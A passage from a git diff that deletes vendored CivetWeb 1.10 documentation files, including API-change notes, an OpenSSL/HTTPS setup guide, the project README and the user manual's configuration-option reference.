-in mg\_websocket\_write functions. 
-If you use websocket write functions them from two threads,
-you must call mg\_lock\_connection explicitly, just like for any
-other connection.
-
-This is an API harmonization issue.
-
-Compatibility:
-If a websocket connection was used in only one thread, there is
-no incompatibility. If a websocket connection was used in multiple
-threads, the user has to add the mg\_lock\_connection before and
-the mg\_unlock\_connection after the websocket write call.
-
-#### open\_file member of mg\_callbacks
-
-This member is going to be removed.
-It is superseeded by mg\_add\_request\_handler.
-
-Compatibility:
-Current code using open\_file needs to be changed.
-Instructions how to do this will be provided.
-
-
-### Client interface
-
-
-#### mg\_init\_library
-
-Calling mg\_init\_library is required before calling any client
-function. In particular, the TLS initialization must be done
-before using mg\_connect\_client\_secure.
-
-Compatibility:
-Some parts of the client interface did not work, if mg\_start
-was not called before. Now server and client become independent.
-
-#### mg\_connect\_client (family)
-
-mg_connect_client needs several new parameters (options).
-
-Details are to be defined.
-
-mg_connect_client and mg_download should return a different kind of
-mg_connection than used in server callbacks. At least, there should
-be a function mg_get_response_info, instead of using 
-mg_get_request_info, and getting the HTTP response code from the
-server by looking into the uri member of struct mg_request_info.
-
-
-### `size_t` in all interface
-
-Having `size_t` in interfaces while building for 32 and 64 bit
-complicates maintenance in an unnecessary way 
-(see [498](https://github.com/civetweb/civetweb/issues/498)).
-
-Replace all data sizes by 64 bit integers.
-
-
-### Pattern definition
-
-The current definition of pattern matching is problematic
-(see [499](https://github.com/civetweb/civetweb/issues/499)).
-
-Find and implement a new definition.
-
-
diff --git a/thirdparty/civetweb-1.10/docs/OpenSSL.md b/thirdparty/civetweb-1.10/docs/OpenSSL.md
deleted file mode 100644
index 1f01cca..0000000
--- a/thirdparty/civetweb-1.10/docs/OpenSSL.md
+++ /dev/null
@@ -1,153 +0,0 @@
-Adding OpenSSL Support
-=====
-
-Civetweb supports *HTTPS* connections using the OpenSSL transport layer
-security (TLS) library. OpenSSL is a free, open source library (see
-http://www.openssl.org/).
-
-
-Getting Started
-----
-
-- Install OpenSSL on your system. There are OpenSSL install packages for all
-  major Linux distributions as well as a setup for Windows.
-- The default build configuration of the civetweb web server will load the
-  required OpenSSL libraries, if a HTTPS certificate has been configured.
-
-
-Civetweb Configuration
-----
-
-The configuration file must contain an https port, identified by a letter 's'
-attached to the port number.
-To serve http and https from their standard ports use the following line in
-the configuration file 'civetweb.conf':
-<pre>
-  listening_ports 80, 443s
-</pre>
-To serve only https use:
-<pre>
-  listening_ports 443s
-</pre>
-
-Furthermore the SSL certificate file must be set:
-<pre>
-  ssl_certificate d:\civetweb\certificate\server.pem
-</pre>
-
-
-Creating a self signed certificate
-----
-
-OpenSSL provides a command line interface, that can be used to create the
-certificate file required by civetweb (server.pem).
-
-One can use the following steps in Windows (in Linux replace "copy" by "cp"
-and "type" by "cat"):
-
-<pre>
-  openssl genrsa -des3 -out server.key 1024
-
-  openssl req -new -key server.key -out server.csr
-
-  copy server.key server.key.orig
-
-  openssl rsa -in server.key.orig -out server.key
-
-  openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt
-
-  copy server.crt server.pem
-
-  type server.key >> server.pem
-</pre>
-
-The server.pem file created must contain a 'CERTIFICATE' section as well as a
-'RSA PRIVATE KEY' section. It should look like this (x represents BASE64
-encoded data):
-
-<pre>
------BEGIN CERTIFICATE-----
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxx
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------END RSA PRIVATE KEY-----
-</pre>
-
-
-Including a certificate from a certificate authority
-----
-
-CivetWeb requires one certificate file in PEM format.
-If you got multiple files from your certificate authority,
-you need to copy their content together into one file.
-Make sure the file has one section BEGIN RSA PRIVATE KEY /
-END RSA PRIVATE KEY, and at least one section
-BEGIN CERTIFICATE / END CERTIFICATE.
-In case you received a file with a section
-BEGIN PRIVATE KEY / END PRIVATE KEY,
-you may get a suitable file by adding the letters RSA manually.
-
-Set the "ssl_certificate" configuration parameter to the
-file name (including path) of the resulting *.pem file.
-
-The file must look like the file in the section
-"Creating a self signed certificate", but it will have several
-BEGIN CERTIFICATE / END CERTIFICATE sections.
-
-
-Common Problems
-----
-
-In case the OpenSSL configuration is not set up correctly, the server will not
-start. Configure an error log file in 'civetweb.conf' to get more information:
-<pre>
-  error_log_file error.log
-</pre>
-
-Check the content of 'error.log':
-
-<pre>
-load_dll: cannot load libeay32.*/libcrypto.*/ssleay32.*/libssl.*
-</pre>
-This error message means, the SSL library has not been installed (correctly).
-For Windows you might use the pre-built binaries. A link is available at the
-OpenSSL project home page (http://www.openssl.org/related/binaries.html).
-Choose the windows system folder as installation directory - this is the
-default location.
-
-<pre>
-set_ssl_option: cannot open server.pem: error:PEM routines:*:PEM_read_bio:no start line
-set_ssl_option: cannot open server.pem: error:PEM routines:*:PEM_read_bio:bad end line
-</pre>
-These error messages indicate, that the format of the ssl_certificate file does
-not match the expectations of the SSL library. The PEM file must contain both,
-a 'CERTIFICATE' and a 'RSA PRIVATE KEY' section. It should be a strict ASCII
-file without byte-order marks.
-The instructions above may be used to create a valid ssl_certificate file.
-
-
diff --git a/thirdparty/civetweb-1.10/docs/README.md b/thirdparty/civetweb-1.10/docs/README.md
deleted file mode 100644
index 9494409..0000000
--- a/thirdparty/civetweb-1.10/docs/README.md
+++ /dev/null
@@ -1,42 +0,0 @@
-![CivetWeb](https://raw.github.com/civetweb/civetweb/master/resources/civetweb_64x64.png "CivetWeb") CivetWeb
-=======
-
-CivetWeb is an easy to use, powerful, C/C++ embeddable web server with optional CGI, SSL and Lua support.
-
-CivetWeb can be used by developers as a library, to add web server functionality to an existing application.
-CivetWeb uses an [MIT license](https://github.com/civetweb/civetweb/blob/master/LICENSE.md).
-
-It can also be used by end users as a stand-alone web server. It is available as single executable, no installation is required.
-
-The current stable version is 1.9.1 - [release notes](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md)
-
-
-End users can download CivetWeb at SourceForge
-[https://sourceforge.net/projects/civetweb/](https://sourceforge.net/projects/civetweb/)
-
-Developers can contribute to CivetWeb via GitHub
-[https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)
-
-Trouble tickets should be filed on GitHub
-[https://github.com/civetweb/civetweb/issues](https://github.com/civetweb/civetweb/issues)
-
-Announcements are at Google Groups
-[https://groups.google.com/d/forum/civetweb](https://groups.google.com/d/forum/civetweb)
-
-While older support question and discussion threads have been at [Google groups](https://groups.google.com/d/forum/civetweb), most newer ones are [GitHub issues](https://github.com/civetweb/civetweb/issues).
-
-Source releases can be found on GitHub
-[https://github.com/civetweb/civetweb/releases](https://github.com/civetweb/civetweb/releases)
-
-
-Documentation
----------------
-
-- [Installing.md](Installing.md) - Install Guide (for end users using pre-built binaries)
-- [UserManual.md](UserManual.md) - End User Guide
-- [Building.md](Building.md) - Building the Server (quick start guide)
-- [Embedding.md](Embedding.md) - Embedding (how to add HTTP support to an existing application)
-- [OpenSSL.md](OpenSSL.md) - Adding HTTPS (SSL/TLS) support using OpenSSL.
-- [API documentation](api) - Additional documentation on the civetweb application programming interface ([civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)).
-
-[Authors](https://github.com/civetweb/civetweb/blob/master/CREDITS.md)
diff --git a/thirdparty/civetweb-1.10/docs/UserManual.md b/thirdparty/civetweb-1.10/docs/UserManual.md
deleted file mode 100644
index 3acf492..0000000
--- a/thirdparty/civetweb-1.10/docs/UserManual.md
+++ /dev/null
@@ -1,814 +0,0 @@
-
-Overview
-=====
-
-Civetweb is a small and easy-to-use web server.
-It may be embedded into C/C++ host applications or used as a stand-alone
-server. See `Embedding.md` for information on embedding civetweb into
-host applications.
-
-The stand-alone server is self-contained, and does not require any external
-software to run. Some Windows users may need to install the
-[Visual C++ Redistributable](http://www.microsoft.com/en-us/download/details.aspx?id=30679).
-
-Installation
-----
-
-On Windows, UNIX and Mac, the civetweb stand-alone executable may be started
-from the command line.
-Running `civetweb` in a terminal, optionally followed by configuration parameters
-(`civetweb [OPTIONS]`) or a configuration file name (`civetweb [config_file_name]`),
-starts the web server.
-
-For UNIX and Mac, civetweb does not detach from the terminal.
-Pressing `Ctrl-C` keys will stop the server.
-
-On Windows, civetweb iconifies itself to the system tray icon when started.
-Right-click on the icon pops up a menu, where it is possible to stop
-civetweb, or configure it, or install it as Windows service.
-
-When started without options, the server exposes the local directory at
-[http](http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol) port 8080.
-Thus, the easiest way to share a folder on Windows is to copy `civetweb.exe`
-to this folder, double-click the exe, and launch a browser at
-[http://localhost:8080](http://localhost:8080). Note that 'localhost' should
-be changed to a machine's name if a folder is accessed from other computer.
-
-When started, civetweb first searches for the configuration file.
-If configuration file is specified explicitly in the command line, i.e.
-`civetweb path_to_config_file`, then specified configuration file is used.
-Otherwise, civetweb would search for file `civetweb.conf` in the same directory
-the executable is located, and use it. This configuration file is optional.
-
-The configuration file is a sequence of lines, each line containing one
-command line argument name and the corresponding value.
-Empty lines, and lines beginning with `#`, are ignored.
-Here is the example of `civetweb.conf` file:
-
-    document_root c:\www
-    listening_ports 80,443s
-    ssl_certificate c:\civetweb\ssl_cert.pem
-
-When a configuration file is used, additional command line arguments may
-override the configuration file settings.
-All command line arguments must start with `-`.
-
-For example: The above `civetweb.conf` file is used, and civetweb started as
-`civetweb -document_root D:\web`. Then the `D:\web` directory will be served
-as document root, because command line options take priority over the
-configuration file. The configuration options section below provides a good
-overview of the Civetweb features.
-
-Note that configuration options on the command line must start with `-`,
-but their names are the same as in the config file. All option names are
-listed in the next section. Thus, the following two setups are equivalent:
-
-    # Using command line arguments
-    $ civetweb -listening_ports 1234 -document_root /var/www
-
-    # Using config file
-    $ cat civetweb.conf
-    listening_ports 1234
-    document_root /var/www
-    $ civetweb
-
-Civetweb can also be used to modify `.htpasswd` passwords files:
-
-    civetweb -A <htpasswd_file> <realm> <user> <passwd>
-
-Unlike other web servers, civetweb does not require CGI scripts to be located
-in a special directory. CGI scripts can be anywhere. CGI (and SSI) files are
-recognized by the file name pattern. Civetweb uses shell-like glob
-patterns. Pattern match starts at the beginning of the string, so essentially
-patterns are prefix patterns. Syntax is as follows:
-
-     **      Matches everything
-     *       Matches everything but slash character, '/'
-     ?       Matches any character
-     $       Matches the end of the string
-     |       Matches if pattern on the left side or the right side matches.
-
-All other characters in the pattern match themselves. Examples:
-
-    **.cgi$      Any string that ends with .cgi
-    /foo         Any string that begins with /foo
-    **a$|**b$    Any string that ends with a or b
-
-# Configuration Options
-
-Below is a list of configuration options understood by Civetweb.
-Every option is followed by its default value. If a default value is not
-present, then the default is empty.
-
-### cgi\_pattern `**.cgi$|**.pl$|**.php$`
-All files that match `cgi_pattern` are treated as CGI files. Default pattern
-allows CGI files be anywhere. To restrict CGIs to a certain directory,
-use `/path/to/cgi-bin/**.cgi` as pattern. Note that the full file path is
-matched against the pattern, not the URI.
-
-### cgi\_environment
-Extra environment variables to be passed to the CGI script in
-addition to standard ones. The list must be comma-separated list
-of name=value pairs, like this: `VARIABLE1=VALUE1,VARIABLE2=VALUE2`.
-
-### put\_delete\_auth\_file
-Passwords file for PUT and DELETE requests. Without a password file, it will not
-be possible to PUT new files to the server or DELETE existing ones. PUT and
-DELETE requests might still be handled by Lua scripts and CGI pages.
-
-### cgi\_interpreter
-Path to an executable to use as CGI interpreter for __all__ CGI scripts
-regardless of the script file extension. If this option is not set (which is
-the default), Civetweb looks at first line of a CGI script,
-[shebang line](http://en.wikipedia.org/wiki/Shebang_(Unix\)), for an
-interpreter (not only on Linux and Mac but also for Windows).
-
-For example, if both PHP and Perl CGIs are used, then
-`#!/path/to/php-cgi.exe` and `#!/path/to/perl.exe` must be first lines of the
-respective CGI scripts. Note that paths should be either full file paths,
-or file paths relative to the current working directory of the civetweb
-server. If civetweb is started by mouse double-click on Windows, the current
-working directory is the directory where the civetweb executable is located.
-
-If all CGIs use the same interpreter, for example they are all PHP, it is
-more efficient to set `cgi_interpreter` to the path to `php-cgi.exe`.
-The  shebang line in the CGI scripts can be omitted in this case.
-Note that PHP scripts must use `php-cgi.exe` as executable, not `php.exe`.
-
-### protect\_uri
-Comma separated list of URI=PATH pairs, specifying that given
-URIs must be protected with password files specified by PATH.
-All Paths must be full file paths.
-
-### authentication\_domain `mydomain.com`
-Authorization realm used for HTTP digest authentication. This domain is
-used in the encoding of the `.htpasswd` authorization files as well.
-Changing the domain retroactively will render the existing passwords useless.
-
-### enable\_auth\_domain\_check `yes`
-When using absolute URLs, verify the host is identical to the authentication\_domain. If enabled, requests to absolute URLs will only be processed 
-if they are directed to the domain. If disabled, absolute URLs to any host
-will be accepted.
-
-### ssi\_pattern `**.shtml$|**.shtm$`
-All files that match `ssi_pattern` are treated as Server Side Includes (SSI).
-
-SSI is a simple interpreted server-side scripting language which is most
-commonly used to include the contents of another file into a web page.
-It can be useful when it is desirable to include a common piece
-of code throughout a website, for example, headers and footers.
-
-In order for a webpage to recognize an SSI-enabled HTML file, the filename
-should end with a special extension, by default the extension should be
-either `.shtml` or `.shtm`. These extensions may be changed using the
-`ssi_pattern` option.
-
-Unknown SSI directives are silently ignored by civetweb. Currently, two SSI
-directives are supported, `<!--#include ...>` and
-`<!--#exec "command">`. Note that the `<!--#include ...>` directive supports
-three path specifications:
-
-    <!--#include virtual="path">  Path is relative to web server root
-    <!--#include abspath="path">  Path is absolute or relative to
-                                  web server working dir
-    <!--#include file="path">,    Path is relative to current document
-    <!--#include "path">
-
-The `include` directive may be used to include the contents of a file or the
-result of running a CGI script. The `exec` directive is used to execute a
-command on a server, and show the output that would have been printed to
-stdout (the terminal window) otherwise. Example:
-
-    <!--#exec "ls -l" -->
-
-For more information on Server Side Includes, take a look at the Wikipedia:
-[Server Side Includes](http://en.wikipedia.org/wiki/Server_Side_Includes)
-
-### throttle
-Limit download speed for clients.  `throttle` is a comma-separated
-list of key=value pairs, where key could be:
-
-    *                   limit speed for all connections
-    x.x.x.x/mask        limit speed for specified subnet
-    uri_prefix_pattern  limit speed for given URIs
-
-The value is a floating-point number of bytes per second, optionally
-followed by a `k` or `m` character, meaning kilobytes and
-megabytes respectively. A limit of 0 means unlimited rate. The
-last matching rule wins. Examples:
-
-    *=1k,10.0.0.0/8=0   limit all accesses to 1 kilobyte per second,
-                        but give connections from the 10.0.0.0/8 subnet
-                        unlimited speed
-
-    /downloads/=5k      limit accesses to all URIs in `/downloads/` to
-                        5 kilobytes per second. All other accesses are unlimited
-
-### access\_log\_file
-Path to a file for access logs. Either full path, or relative to the current
-working directory. If absent (default), then accesses are not logged.
-
-### enable\_directory\_listing `yes`
-Enable directory listing, either `yes` or `no`.
-
-### error\_log\_file
-Path to a file for error logs. Either full path, or relative to the current
-working directory. If absent (default), then errors are not logged.
-
-### global\_auth\_file
-Path to a global passwords file, either full path or relative to the current
-working directory. If set, per-directory `.htpasswd` files are ignored,
-and all requests are authorized against that file.
-
-The file has to include the realm set through `authentication_domain` and the
-password in digest format:
-
-    user:realm:digest
-    test:test.com:ce0220efc2dd2fad6185e1f1af5a4327
-
-Password files may be generated using `civetweb -A` as explained above, or
-online tools e.g. [this generator](http://www.askapache.com/online-tools/htpasswd-generator).
-
-### index\_files `index.xhtml,index.html,index.htm,index.cgi,index.shtml,index.php`
-Comma-separated list of files to be treated as directory index files.
-If more than one matching file is present in a directory, the one listed to the left
-is used as a directory index.
-
-In case built-in Lua support has been enabled, `index.lp,index.lsp,index.lua`
-are additional default index files, ordered before `index.cgi`.
-
-### enable\_keep\_alive `no`
-Enable connection keep alive, either `yes` or `no`.
-
-Allows clients to reuse TCP connection for subsequent HTTP requests, 
-which improves performance.
-For this to work when using request handlers it is important to add the
-correct Content-Length HTTP header for each request. If this is forgotten the
-client will time out.
-
-Note: If you set keep\_alive to `yes`, you should set keep\_alive\_timeout\_ms
-to some value > 0 (e.g. 500). If you set keep\_alive to `no`, you should set
-keep\_alive\_timeout\_ms to 0. Currently, this is done as a default value,
-but this configuration is redundant. In a future version, the keep\_alive 
-configuration option might be removed and automatically set to `yes` if 
-a timeout > 0 is set.
-
-### access\_control\_list
-An Access Control List (ACL) allows restrictions to be put on the list of IP
-addresses which have access to the web server. In the case of the Civetweb
-web server, the ACL is a comma separated list of IP subnets, where each
-subnet is pre-pended by either a `-` or a `+` sign. A plus sign means allow,
-where a minus sign means deny. If a subnet mask is omitted, such as `-1.2.3.4`,
-this means to deny only that single IP address.
-
-Subnet masks may vary from 0 to 32, inclusive. The default setting is to allow
-all accesses. On each request the full list is traversed, and
-the last match wins. Examples:
-
-    -0.0.0.0/0,+192.168/16    deny all accesses, only allow 192.168/16 subnet
-
-To learn more about subnet masks, see the
-[Wikipedia page on Subnetwork](http://en.wikipedia.org/wiki/Subnetwork).
-
-### extra\_mime\_types
-Extra mime types, in the form `extension1=type1,extension2=type2,...`.
-See the [Wikipedia page on Internet media types](http://en.wikipedia.org/wiki/Internet_media_type).
-Extension must include a leading dot. Example:
-`.cpp=plain/text,.java=plain/text`
-
-### listening\_ports `8080`
-Comma-separated list of ports to listen on. If the port is SSL, a
-letter `s` must be appended, for example, `80,443s` will open
-port 80 and port 443, and connections on port 443 will be SSL-ed.
-For non-SSL ports, it is allowed to append letter `r`, meaning 'redirect'.
-Redirect ports will redirect all their traffic to the first configured
-SSL port. For example, if `listening_ports` is `80r,443s`, then all
-HTTP traffic coming at port 80 will be redirected to HTTPS port 443.
-
-It is possible to specify an IP address to bind to. In this case,
-an IP address and a colon must be pre-pended to the port number.
-For example, to bind to a loopback interface on port 80 and to
-all interfaces on HTTPS port 443, use `127.0.0.1:80,443s`.
-
-If the server is built with IPv6 support, `[::]:8080` can be used to
-listen to IPv6 connections to port 8080. IPv6 addresses of network
-interfaces can be specified as well,
-e.g. `[::1]:8080` for the IPv6 loopback interface.
-
-[::]:80 will bind to port 80 IPv6 only. In order to use port 80 for
-all interfaces, both IPv4 and IPv6, use either the configuration
-`80,[::]:80` (create one socket for IPv4 and one for IPv6 only),
-or `+80` (create one socket for both, IPv4 and IPv6). 
-The `+`-notation to use IPv4 and IPv6 will only work if no network
-interface is specified. Depending on your operating system version
-and IPv6 network environment, some configurations might not work
-as expected, so you have to test to find the configuration most 
-suitable for your needs. In case `+80` does not work for your
-environment, you need to use `80,[::]:80`.
-
-It is possible to use network interface addresses (e.g., `192.0.2.3:80`,
-`[2001:0db8::1234]:80`). To get a list of available network interface
-addresses, use `ipconfig` (in a `cmd` window in Windows) or `ifconfig` 
-(in a Linux shell).
-Alternatively, you could use the hostname for an interface. Check the 
-hosts file of your operating system for a proper hostname 
-(for Windows, usually found in C:\Windows\System32\drivers\etc\, 
-for most Linux distributions: /etc/hosts). E.g., to bind the IPv6 
-local host, you could use `ip6-localhost:80`. This translates to 
-`[::1]:80`. Beside the hosts file, there are several other name
-resolution services. Using your hostname might bind you to the
-localhost or an external interface. You could also try `hostname.local`,
-if the proper network services are installed (Zeroconf, mDNS, Bonjour, 
-Avahi). When using a hostname, you need to test in your particular network
-environment - in some cases, you might need to resort to a fixed IP address.
-
-### document\_root `.`
-A directory to serve. By default, the current working directory is served.
-The current directory is commonly referenced as dot (`.`).
-It is recommended to use an absolute path for document\_root, in order to 
-avoid accidentally serving the wrong directory.
-
-### ssl\_certificate
-Path to the SSL certificate file. This option is only required when at least
-one of the `listening\_ports` is SSL. The file must be in PEM format,
-and it must have both, private key and certificate, see for example
-[ssl_cert.pem](https://github.com/civetweb/civetweb/blob/master/resources/ssl_cert.pem)
-A description how to create a certificate can be found in doc/OpenSSL.md
-
-### num\_threads `50`
-Number of worker threads. Civetweb handles each incoming connection in a
-separate thread. Therefore, the value of this option is effectively the number
-of concurrent HTTP connections Civetweb can handle.
-
-### run\_as\_user
-Switch to given user credentials after startup. Usually, this option is
-required when civetweb needs to bind on privileged ports on UNIX. To do
-that, civetweb needs to be started as root. From a security point of view,
-running as root is not advisable, therefore this option can be used to drop
-privileges. Example:
-
-    civetweb -listening_ports 80 -run_as_user webserver
-
-### url\_rewrite\_patterns
-Comma-separated list of URL rewrites in the form of
-`uri_pattern=file_or_directory_path`. When Civetweb receives any request,
-it constructs the file name to show by combining `document_root` and the URI.
-However, if the rewrite option is used and `uri_pattern` matches the
-requested URI, then `document_root` is ignored. Instead,
-`file_or_directory_path` is used, which should be a full path name or
-a path relative to the web server's current working directory. Note that
-`uri_pattern`, as all civetweb patterns, is a prefix pattern.
-
-This makes it possible to serve many directories outside from `document_root`,
-redirect all requests to scripts, and do other tricky things. For example,
-to redirect all accesses to `.doc` files to a special script, do:
-
-    civetweb -url_rewrite_patterns **.doc$=/path/to/cgi-bin/handle_doc.cgi
-
-Or, to imitate support for user home directories, do:
-
-    civetweb -url_rewrite_patterns /~joe/=/home/joe/,/~bill=/home/bill/
-
-### hide\_files\_patterns
-A pattern for the files to hide. Files that match the pattern will not
-show up in directory listing and return `404 Not Found` if requested. Pattern
-must be for a file name only, not including directory names. Example:
-
-    civetweb -hide_files_patterns secret.txt|**.hide
-
-Note: hide\_file\_patterns uses the pattern described above. If you want to
-hide all files with a certain extension, make sure to use **.extension
-(not just *.extension).
-
-### request\_timeout\_ms `30000`
-Timeout for network read and network write operations, in milliseconds.
-If a client intends to keep long-running connection, either increase this
-value or (better) use keep-alive messages.
-
-### keep\_alive\_timeout\_ms `500` or `0`
-Idle timeout between two requests in one keep-alive connection.
-If keep alive is enabled, multiple requests using the same connection 
-are possible. This reduces the overhead for opening and closing connections
-when loading several resources from one server, but it also blocks one port
-and one thread at the server during the lifetime of this connection.
-Unfortunately, browsers do not close the keep-alive connection after loading
-all resources required to show a website.
-The server closes a keep-alive connection, if there is no additional request
-from the client during this timeout.
-
-Note: if enable\_keep\_alive is set to `no` the value of 
-keep\_alive\_timeout\_ms should be set to `0`, if enable\_keep\_alive is set 
-to `yes`, the value of keep\_alive\_timeout\_ms must be >0.
-Currently keep\_alive\_timeout\_ms is ignored if enable\_keep\_alive is no,
-but future versions may drop the enable\_keep\_alive configuration value and
-automatically use keep-alive if keep\_alive\_timeout\_ms is not 0.
-
-### linger\_timeout\_ms
-Set TCP socket linger timeout before closing sockets (SO\_LINGER option).
-The configured value is a timeout in milliseconds. Setting the value to 0
-will yield in abortive close (if the socket is closed from the server side).
-Setting the value to -1 will turn off linger.
-If the value is not set (or set to -2), CivetWeb will not set the linger
-option at all.
-
-Note: For consistency with other timeouts, the value is configured in
-milliseconds. However, the TCP socket layer usually only offers a timeout in 
-seconds, so the value should be an integer multiple of 1000.
-
-### lua\_preload\_file
-This configuration option can be used to specify a Lua script file, which
-is executed before the actual web page script (Lua script, Lua server page
-or Lua websocket). It can be used to modify the Lua environment of all web
-page scripts, e.g., by loading additional libraries or defining functions
-required by all scripts.
-It may be used to achieve backward compatibility by defining obsolete
-functions as well.
-
-### lua\_script\_pattern `"**.lua$`
-A pattern for files that are interpreted as Lua scripts by the server.
-In contrast to Lua server pages, Lua scripts use plain Lua syntax.
-An example can be found in the test directory.
-
-### lua\_server\_page\_pattern `**.lp$|**.lsp$`
-Files matching this pattern are treated as Lua server pages.
-In contrast to Lua scripts, the content of a Lua server pages is delivered
-directly to the client. Lua script parts are delimited from the standard
-content by including them between <? and ?> tags.
-An example can be found in the test directory.
-
-### lua\_background\_script
-Experimental feature, and subject to change.
-Run a Lua script in the background, independent from any connection.
-The script is started before network access to the server is available.
-It can be used to prepare the document root (e.g., update files, compress
-files, ...), check for external resources, remove old log files, etc.
-
-The Lua state remains open until the server is stopped.
-In the future, some callback functions will be available to notify the
-script on changes of the server state. See example lua script :
-[background.lua](https://github.com/civetweb/civetweb/blob/master/test/background.lua).
-
-Additional functions available in background script :
-sleep, root path, script name, isterminated
-
-### lua\_background\_script\_params `param1=1,param2=2`
-Can add dynamic parameters to background script.
-Parameters mapped to global 'mg' table 'params' field.
-
-### websocket\_root
-In case civetweb is built with Lua and websocket support, Lua scripts may
-be used for websockets as well. Since websockets use a different URL scheme
-(ws, wss) than other http pages (http, https), the Lua scripts used for
-websockets may also be served from a different directory. By default,
-the document_root is used as websocket_root as well.
-
-
-### access\_control\_allow\_origin `*`
-Access-Control-Allow-Origin header field, used for cross-origin resource
-sharing (CORS).
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-
-### access\_control\_allow\_methods `*`
-Access-Control-Allow-Methods header field, used for cross-origin resource
-sharing (CORS) pre-flight requests.
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-If set to an empty string, pre-flights will not be supported directly by the server,
-but scripts may still support pre-flights by handling the OPTIONS method properly.
-If set to "*", the pre-flight will allow whatever method has been requested.
-If set to a comma separated list of valid HTTP methods, the pre-flight will return
-exactly this list as allowed method.
-If set in any other way, the result is unspecified.
-
-
-### access\_control\_allow\_headers `*`
-Access-Control-Allow-Headers header field, used for cross-origin resource
-sharing (CORS) pre-flight requests.
-See the [Wikipedia page on CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing).
-
-If set to an empty string, pre-flights will not allow additional headers.
-If set to "*", the pre-flight will allow whatever headers have been requested.
-If set to a comma separated list of valid HTTP headers, the pre-flight will return
-exactly this list as allowed headers.
-If set in any other way, the result is unspecified.
-
-
-### error\_pages
-This option may be used to specify a directory for user defined error pages.
-The error pages may be specified for an individual http status code (e.g.,
-404 - page requested by the client not found), a group of http status codes
-(e.g., 4xx - all client errors) or all errors. The corresponding error pages
-must be called error404.ext, error4xx.ext or error.ext, whereas the file
-extension may be one of the extensions specified for the index_files option.
-See the [Wikipedia page on HTTP status codes](http://en.wikipedia.org/wiki/HTTP_status_code).
-
-### tcp\_nodelay `0`
-Enable TCP_NODELAY socket option on client connections.
-
-If set the socket option will disable Nagle's algorithm on the connection
-which means that packets will be sent as soon as possible instead of waiting
-for a full buffer or timeout to occur.
-
-    0    Keep the default: Nagle's algorithm enabled
-    1    Disable Nagle's algorithm for all sockets
-
-### static\_file\_max\_age `3600`
-Set the maximum time (in seconds) a cache may store a static files.
-
-This option will set the `Cache-Control: max-age` value for static files.
-Dynamically generated content, i.e., content created by a script or callback,
-must send cache control headers by themselves.
-
-A value >0 corresponds to a maximum allowed caching time in seconds.
-This value should not exceed one year (RFC 2616, Section 14.21).
-A value of 0 will send "do not cache" headers for all static files.
-For values <0 and values >31622400, the behavior is undefined.
-
-### strict\_transport\_security\_max\_age
-
-Set the `Strict-Transport-Security` header, and set the `max-age` value.
-This instructs web browsers to interact with the server only using HTTPS,
-never by HTTP. If set, it will be sent for every request handled directly
